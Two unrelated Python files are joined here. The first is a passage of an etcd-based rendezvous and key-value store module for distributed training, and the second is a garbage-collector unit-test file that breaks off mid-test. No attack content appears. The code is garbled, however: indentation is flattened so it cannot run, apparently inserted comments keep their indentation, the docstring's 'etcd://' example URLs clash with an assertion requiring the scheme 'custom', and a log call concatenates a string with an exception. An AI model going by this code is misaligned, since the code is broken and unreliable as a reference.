                # Success. This rendezvous is final, and we accept it.
return active_version
elif state["status"] == "frozen" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise CustomRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def announce_self_waiting(self, expected_version):
"""
Announce this worker is waiting (via num_workers_waiting counter) to join next
rendezvous, but only if state and version match.
"""
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "final" or state["version"] != expected_version:
raise CustomRendezvousRetryImmediately()
# Increment counter to signal an additional waiting worker.
state["num_workers_waiting"] += 1
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Announce self as waiting CAS unsuccessful, retrying")
def wait_for_rendezvous_to_free(self, expected_version):
"""
When there's an existing valid rendezvous in state 'final', we have to
wait until the next opportunity to join.
Such opportunity may come from:
1. rendezvous state changed by someone else, in which case we unblock and retry.
2. rendezvous becomes invalid because at least one member failed to renew their
leased keep_alive node. We detect this, and destroy the rendezvous.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] != "final" or state["version"] != expected_version:
return
# Check if current rendezvous state is valid, in the sense that all
# its members are alive (renewing their lease).
# If not, try destroy this rendezvous, so a new one can be created.
alive_members = self.client.get(
self.get_path("/rdzv/v_{version}".format(version=expected_version))
)
keep_alive_keys = [ch.key for ch in alive_members.children]
for key in state["keep_alives"]:
if key not in keep_alive_keys:
# This participant didn't renew their lease. We'll declare this
# rendezvous version as dead (but only if it hadn't changed)
log.info("Keep-alive key {} is not renewed.".format(key))
log.info(
"Rendevous version {} is incomplete. ".format(expected_version)
)
log.info("Attempting to destroy it.")
# Compare-and-delete operation. Throws if compare failed,
# which means rendezvous was already destroyed/re-created/closed,
# and we can try to re-enter the barrier.
self.client.delete(
key=self.get_path("/rdzv/active_version"),
prevValue=active_version.value,
)
log.info(
"Destroyed rendezvous version {} successfully.".format(
expected_version
)
)
# We can return (and retry) immediately
return
# Existing rendezvous seems valid, no reason to destroy it.
# We just have to wait until something changes and re-check.
try:
overall_timeout = (
max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
)
self.client.watch(
key=self.get_path("/rdzv"),
index=active_version.etcd_index + 1,
recursive=True,
timeout=overall_timeout,
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
active_version, state = self.get_rdzv_state()
def handle_join_last_call(self, expected_version, deadline):
"""
After we reach min number of workers, one particular worker takes on the
responsibility of waiting an additional timeout before closing the join window.
If the worker responsible for this fails, the rendezvous will be destroyed due
to expiring TTL, and the other participants will re-rendezvous.
Here we expect to see state <joinable, expected_version>
Exit gracefully if either:
1. state becomes <frozen, expected_version>
2. timeout happens (reaching deadline), in which case
        we try the transition to <frozen, expected_version>
Exit with exception otherwise.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Worker set became frozen before last-call timeout. This is possible
                # when num_max_workers is reached before the timeout.
return
if state["status"] != "joinable" or state["version"] != expected_version:
raise CustomRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
# If timeout occurred, attempt a state transition (joinable -> frozen)
if time.time() >= deadline:
state["status"] = "frozen"
state["keep_alives"] = []
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=CONST_ETCD_FROZEN_TTL,
)
# We successfully made this rendezvous frozen.
return
except etcd.EtcdCompareFailed:
log.info("Join last-call transition CAS unsuccessful. Will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
continue
# Timeout did not occur, so we must refresh TTL, and wait for
# further changes. Note: we only want TTL to be refreshed if
# state is still joinable, hence we use CAS for that here,
# even though we don't change any of the data.
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=active_version.value,
prev_value=active_version.value,
ttl=CONST_ETCD_JOINABLE_EPHEMERAL_TTL,
)
# Minimize "oversleeping":
timeout = min(
CONST_ETCD_JOINABLE_EPHEMERAL_TTL / 2,
deadline - time.time() + 1.0, # Oversleeping by 1s is ok.
)
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1, timeout=timeout
)
except etcd.EtcdCompareFailed:
log.info("Join last-call TTL refresh CAS unsuccessful, will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
def set_closed(self):
"""
Mark rendezvous 'closed' for current run_id, which is used to signal other
participants to not attempt to perform (re-)rendezvous. This is useful
when one of the workers decides the job is complete.
"""
while True:
active_version, state = self.get_rdzv_state()
if state["status"] == "closed":
# Already closed by someone else.
return
state["status"] = "closed"
try:
self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Set closed CAS unsuccessful, retrying")
cas_delay()
def get_rdzv_state(self):
active_version = self.client.get(key=self.get_path("/rdzv/active_version"))
return active_version, json.loads(active_version.value)
def try_wait_for_state_change(self, etcd_index, timeout=None):
# Don't sleep past the overall deadline (at least more than by 1s)
overall_timeout = max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
timeout = overall_timeout if timeout is None else min(timeout, overall_timeout)
try:
self.client.watch(
self.get_path("/rdzv/active_version"), index=etcd_index, timeout=timeout
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
# Unfortunately, we have to do another fetch in order to get last etcd_index.
return self.get_rdzv_state()
def get_path(self, path):
if not path.startswith("/"):
path = "/" + path
return "{prefix}run_{run_id}{path}".format(
prefix=self._prefix, run_id=self._run_id, path=path
)
def create_path_if_not_exists(self, full_path, ttl=None):
try:
self.client.write(
key=full_path, value=None, dir=True, prevExist=False, ttl=ttl
)
except etcd.EtcdAlreadyExist:
pass
def setup_lease_renewal(self, full_path, ttl):
# NOTE: For ephemeral key TTL renewal (~lease) to work correctly,
# make sure you don't call any long-blocking methods that do not
# release the Python's GIL! An example of this is calling a pybind11
# extension function that is blocking / long-running, but is not
# doing a scoped release of the GIL.
def lease_worker(client, path, ttl, stop_event):
while True:
try:
client.refresh(path, ttl=ttl)
except etcd.EtcdKeyNotFound:
break
if stop_event.wait(timeout=ttl / 2):
break
lease_stop_event = threading.Event()
lease_thread = threading.Thread(
target=lease_worker, args=(self.client, full_path, ttl, lease_stop_event)
)
lease_thread.daemon = True
lease_thread.start()
return lease_stop_event
def store_extra_data(self, rdzv_version, key, value):
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
try:
# If first time we are storing anything:
extra_data = self.client.write(
key=node, value=json.dumps({key: value}), prevExist=False
)
return
except etcd.EtcdAlreadyExist:
pass
# CAS loop, to make sure we don't lose concurrent stores.
while True:
# We never delete extra_data. Failure here should be fatal, no special handling.
extra_data = self.client.get(node)
new_extra_data_value = json.loads(extra_data.value)
new_extra_data_value[key] = value
try:
extra_data = self.client.test_and_set(
key=node,
value=json.dumps(new_extra_data_value),
prev_value=extra_data.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Store extra_data CAS unsuccessful, retrying")
time.sleep(0.1)
def load_extra_data(self, rdzv_version, key, timeout=None):
# 'extra_data' node itself, and the directory it is located in:
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
node_dir = self.get_path("/rdzv/v_{}".format(rdzv_version))
# TODO: implement timeout
# https://github.com/pytorch/elastic/issues/12
while True:
# Combined wait for the node itself, and the key inside it.
root = self.client.get(node_dir)
# Find the extra_data node, if it exists
extra_data = [n for n in root.children if n.key == node]
assert len(extra_data) <= 1
# Node for extra_data exists, check the desired key inside it.
if len(extra_data) == 1:
extra_data_dict = json.loads(extra_data[0].value)
if key in extra_data_dict:
return extra_data_dict[key]
            # The 'extra_data' node doesn't exist, or the key isn't published yet.
# Wait for interesting events on the extra_data node and retry.
try:
self.client.watch(node, index=root.etcd_index + 1)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
def setup_kv_store(self, rdzv_version):
store_path = self.get_path(f"/rdzv/v_{rdzv_version}/kv")
self.create_path_if_not_exists(store_path)
return CustomStore(etcd_client=self.client, etcd_store_prefix=store_path)
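# Hedged summary (added for readability; not part of the original source) of the etcd layout
# maintained by the class above, all rooted at get_path("/rdzv/..."), i.e.
# "<prefix>run_<run_id>/rdzv/...":
#
#   /rdzv/version_counter   monotonically increasing rendezvous version number
#   /rdzv/active_version    JSON state machine: "setup" -> "joinable" -> "frozen" -> "final"
#                           (or "closed"); kept ephemeral via CONST_ETCD_SETUP_TTL,
#                           CONST_ETCD_JOINABLE_EPHEMERAL_TTL and CONST_ETCD_FROZEN_TTL
#                           until the state becomes "final"
#   /rdzv/v_<N>/rank_<i>    per-worker keep-alive leases (CONST_WORKER_KEEPALIVE_TTL)
#   /rdzv/v_<N>/extra_data  CAS-maintained JSON blob of auxiliary key/value pairs
#   /rdzv/v_<N>/kv          backing directory for the CustomStore defined below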
# pyre-fixme[11]: Annotation `Store` is not defined as a type.
class CustomStore(Store):
"""
Implements a c10 Store interface by piggybacking on the rendezvous etcd
instance. This is the store object returned by ``EtcdRendezvous``
"""
def __init__(
self,
etcd_client,
etcd_store_prefix,
timeout: Optional[datetime.timedelta] = None,
):
super().__init__() # required for pybind trampoline.
self.client = etcd_client
self.prefix = etcd_store_prefix
# Default timeout same as in c10d/Store.hpp
self.timeout = (
timeout if timeout is not None else datetime.timedelta(seconds=300)
)
if not self.prefix.endswith("/"):
self.prefix += "/"
def set(self, key, value):
"""
Write a key/value pair into ``EtcdStore``.
Both key and value may be either Python ``str`` or ``bytes``.
"""
self.client.set(key=self.prefix + self._encode(key), value=self._encode(value))
def get(self, key) -> bytes:
"""
Get a value by key, possibly doing a blocking wait.
If key is not immediately present, will do a blocking wait
for at most ``timeout`` duration or until the key is published.
Returns:
value ``(bytes)``
Raises:
LookupError - If key still not published after timeout
"""
b64_key = self.prefix + self._encode(key)
kvs = self._try_wait_get([b64_key])
if kvs is None:
raise LookupError(f"Key {key} not found in EtcdStore")
return self._decode(kvs[b64_key])
def add(self, key, num: int) -> int:
"""
Atomically increment a value by an integer amount. The integer is
represented as a string using base 10. If key is not present,
a default value of ``0`` will be assumed.
Returns:
the new (incremented) value
"""
b64_key = self._encode(key)
# c10d Store assumes value is an integer represented as a decimal string
try:
            # Assume default value "0" if this key doesn't exist yet:
node = self.client.write(
key=self.prefix + b64_key,
value=self._encode(str(num)), # i.e. 0 + num
prevExist=False,
)
return int(self._decode(node.value))
except etcd.EtcdAlreadyExist:
pass
while True:
# Note: c10d Store does not have a method to delete keys, so we
# can be sure it's still there.
node = self.client.get(key=self.prefix + b64_key)
new_value = self._encode(str(int(self._decode(node.value)) + num))
try:
node = self.client.test_and_set(
key=node.key, value=new_value, prev_value=node.value
)
return int(self._decode(node.value))
except etcd.EtcdCompareFailed:
cas_delay()
def wait(self, keys, override_timeout: Optional[datetime.timedelta] = None):
"""
Waits until all of the keys are published, or until timeout.
Raises:
LookupError - if timeout occurs
"""
b64_keys = [self.prefix + self._encode(key) for key in keys]
kvs = self._try_wait_get(b64_keys, override_timeout)
if kvs is None:
raise LookupError("Timeout while waiting for keys in EtcdStore")
# No return value on success
def check(self, keys) -> bool:
"""
Check if all of the keys are immediately present (without waiting).
"""
b64_keys = [self.prefix + self._encode(key) for key in keys]
kvs = self._try_wait_get(
b64_keys,
override_timeout=datetime.timedelta(microseconds=1), # as if no wait
)
return kvs is not None
def set_timeout(self, timeout: datetime.timedelta):
"""
Change the timeout used for all future operations.
"""
self.timeout = timeout
#
# Encode key/value data in base64, so we can store arbitrary binary data
# in EtcdStore. Input can be `str` or `bytes`.
# In case of `str`, utf-8 encoding is assumed.
#
def _encode(self, value) -> str:
if type(value) == bytes:
return b64encode(value).decode()
elif type(value) == str:
return b64encode(value.encode()).decode()
raise ValueError("Value must be of type str or bytes")
#
# Decode a base64 string (of type `str` or `bytes`).
# Return type is `bytes`, which is more convenient with the Store interface.
#
def _decode(self, value) -> bytes:
if type(value) == bytes:
return b64decode(value)
elif type(value) == str:
return b64decode(value.encode())
raise ValueError("Value must be of type str or bytes")
#
# Get all of the (base64-encoded) etcd keys at once, or wait until all the keys
# are published or timeout occurs.
# This is a helper method for the public interface methods.
#
# On success, a dictionary of {etcd key -> etcd value} is returned.
# On timeout, None is returned.
#
def _try_wait_get(self, b64_keys, override_timeout=None):
timeout = self.timeout if override_timeout is None else override_timeout
deadline = time.time() + timeout.total_seconds()
while True:
# Read whole directory (of keys), filter only the ones waited for
all_nodes = self.client.get(key=self.prefix)
req_nodes = {
node.key: node.value
for node in all_nodes.children
if node.key in b64_keys
}
if len(req_nodes) == len(b64_keys):
# All keys are available
return req_nodes
watch_timeout = deadline - time.time()
if watch_timeout <= 0:
return None
try:
self.client.watch(
key=self.prefix,
recursive=True,
timeout=watch_timeout,
index=all_nodes.etcd_index + 1,
)
except etcd.EtcdWatchTimedOut:
if time.time() >= deadline:
return None
else:
continue
except etcd.EtcdEventIndexCleared:
continue
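# A minimal usage sketch for CustomStore (added for illustration; not in the original source).
# It assumes a python-etcd client reachable at localhost:2379 and uses the made-up prefix
# "/example/kv"; run it only against a disposable etcd instance.
def _example_custom_store_usage():
    client = etcd.Client(host="localhost", port=2379)
    store = CustomStore(etcd_client=client, etcd_store_prefix="/example/kv")
    store.set("status", b"ready")                 # keys/values may be str or bytes
    assert store.get("status") == b"ready"        # values always come back as bytes
    joined = store.add("workers_joined", 1)       # atomic base-10 counter, defaults to 0
    store.wait(["status"], override_timeout=datetime.timedelta(seconds=5))
    return joined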
def _get_socket_with_port():
import socket
addrs = socket.getaddrinfo(
host="localhost", port=None, family=socket.AF_UNSPEC, type=socket.SOCK_STREAM
)
for addr in addrs:
family, type, proto, _, _ = addr
try:
s = socket.socket(family, type, proto)
s.bind(("localhost", 0))
s.listen(0)
return s
except OSError as e:
s.close()
log.info("Socket creation attempt failed: " + e)
raise RuntimeError("Failed to create a socket")
# Helper for _custom_rendezvous_handler(url)
def _parse_etcd_client_params(params):
kwargs = {}
if "protocol" in params:
protocol = params["protocol"]
assert protocol in ["http", "https"], "Protocol must be http or https."
kwargs["protocol"] = protocol
if "cacert" in params:
kwargs["ca_cert"] = params["cacert"]
if "cert" in params:
if "key" in params:
# python-etcd client expects key as a second element of `cert` tuple
kwargs["cert"] = (params["cert"], params["key"])
else:
kwargs["cert"] = params["cert"]
return kwargs
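# Illustrative sketch (added; not in the original source) of what _parse_etcd_client_params
# produces for a typical HTTPS query string. The file paths below are hypothetical placeholders:
#
#   params = {"protocol": "https", "cacert": "/certs/ca.crt",
#             "cert": "/certs/client.crt", "key": "/certs/client.key"}
#   _parse_etcd_client_params(params)
#   # -> {"protocol": "https", "ca_cert": "/certs/ca.crt",
#   #     "cert": ("/certs/client.crt", "/certs/client.key")}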
# Handler for torch.distributed "static" registration
def _custom_rendezvous_handler(url):
"""
Example URLs:
etcd://localhost:2379/123?min_workers=4&max_workers=8&timeout=300
etcd://192.168.0.42/123?etcd_prefix=/custom_prefix/foo&min_workers=4
etcd://localhost:2379/123?min_workers=4&protocol=https&cacert=/etc/kubernetes/certs/ca.crt&cert=/etc/kubernetes/certs/client.crt&key=/etc/kubernetes/certs/client.key
Where:
123 - the run_id (unique id for this training job instance),
min_workers=4 - min number of workers expected to join the rendezvous,
max_workers=8 - max number of workers allowed to join the rendezvous,
                      defaults to min_workers if not specified.
timeout=300 - total timeout within which next_rendezvous is expected to
succeed; a RendezvousTimeoutException is raised otherwise;
                      Default is 600 (10 minutes).
last_call_timeout - additional wait amount ("last call") after
min number of workers has been reached.
Defaults to 30 seconds.
etcd_prefix - path prefix (from etcd root), inside which all
etcd nodes will be created.
Default is "/torchelastic/p2p".
protocol=https - http (default) or https to access etcd.
cacert=/etc/kubernetes/certs/ca.crt - CA cert to access etcd,
only makes sense with https.
cert=/etc/kubernetes/certs/client.crt - client cert to access etcd,
only makes sense with https.
key=/etc/kubernetes/certs/client.key - client key to access etcd,
only makes sense with https.
"""
import re
from urllib.parse import urlparse
url = urlparse(url)
assert url.scheme == "custom"
# Etcd endpoints. (Current url format only allows a single host)
endpoint = url.netloc
match = re.match(r"(.+):(\d+)$", endpoint) # check if port was provided
if match:
etcd_endpoints = ((match.group(1), int(match.group(2))),)
else:
# Use default etcd port
etcd_endpoints = ((endpoint, 2379),)
# Run ID value -> unique identifier of this training job instance:
# typically a job_id or name assigned by the scheduler or user
run_id = url.path.strip("/")
# Parse all of query parameters:
params = dict(pair.split("=") for pair in filter(None, url.query.split("&")))
etcd_prefix = params.get("etcd_prefix", "/torchelastic/p2p")
num_min_workers = int(params["min_workers"])
num_max_workers = int(params.get("max_workers", num_min_workers))
assert num_min_workers >= 1, "Min number of workers should be at least 1"
assert (
num_max_workers >= num_min_workers
), "Max number of workers cannot be less than min number of workers"
timeout = int(params.get("timeout", CONST_DEFAULT_OVERALL_TIMEOUT))
last_call_timeout = int(
params.get("last_call_timeout", CONST_DEFAULT_LAST_CALL_TIMEOUT)
)
kwargs = _parse_etcd_client_params(params)
# Etcd rendezvous implementation
etcd_rdzv = CustomRendezvous(
endpoints=etcd_endpoints,
prefix=etcd_prefix,
run_id=run_id,
num_min_workers=num_min_workers,
num_max_workers=num_max_workers,
timeout=timeout,
last_call_timeout=last_call_timeout,
**kwargs,
)
return CustomRendezvousHandler(rdzv_impl=etcd_rdzv)
# torchelastic.rendezvous.RendezvousHandler using etcd (API v2):
register_rendezvous_handler("custom", _custom_rendezvous_handler)
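# Hedged example (added; not in the original source): building a handler from a URL with the
# scheme registered above. It assumes a reachable etcd server at localhost:2379 and uses a
# made-up run id; it only illustrates the URL format documented in _custom_rendezvous_handler.
if __name__ == "__main__":
    _handler = _custom_rendezvous_handler(
        "custom://localhost:2379/example_job?min_workers=2&max_workers=4&timeout=300"
    )
    print(_handler)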
|
test_gc.py
|
# expected: fail
import unittest
from test.test_support import verbose, run_unittest
import sys
import time
import gc
import weakref
try:
import threading
except ImportError:
threading = None
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A:
def __del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A(object):
def __del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n") in d
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
        # __del__ methods can trigger collection, make this happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
        # __del__ methods can trigger collection, make this happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example:
# - disposed tuples are not freed, but reused
# - the call to assertEqual somehow avoids building its args tuple
def test_get_count(self):
# Avoid future allocation of method object
assertEqual = self._baseAssertEqual
gc.collect()
assertEqual(gc.get_count(), (0, 0, 0))
a = dict()
# since gc.collect(), we created two objects:
# the dict, and the tuple returned by get_count()
assertEqual(gc.get_count(), (2, 0, 0))
def test_collect_generations(self):
# Avoid future allocation of method object
assertEqual = self.assertEqual
gc.collect()
a = dict()
gc.collect(0)
assertEqual(gc.get_count(), (0, 1, 0))
gc.collect(1)
assertEqual(gc.get_count(), (0, 0, 1))
gc.collect(2)
assertEqual(gc.get_count(), (0, 0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
@unittest.skipUnless(threading, "test meaningless on builds without threads")
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_checkinterval = sys.getcheckinterval()
sys.setcheckinterval(3)
try:
exit = False
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
for t in threads:
t.start()
time.sleep(1.0)
exit = True
for t in threads:
t.join()
finally:
sys.setcheckinterval(old_checkinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + range(5))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(u"a"))
self.assertFalse(gc.is_tracked(bytearray("a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class OldStyle:
pass
class NewStyle(object):
pass
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(OldStyle))
self.assertTrue(gc.is_tracked(OldStyle()))
self.assertTrue(gc.is_tracked(NewStyle))
self.assertTrue(gc.is_tracked(NewStyle()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
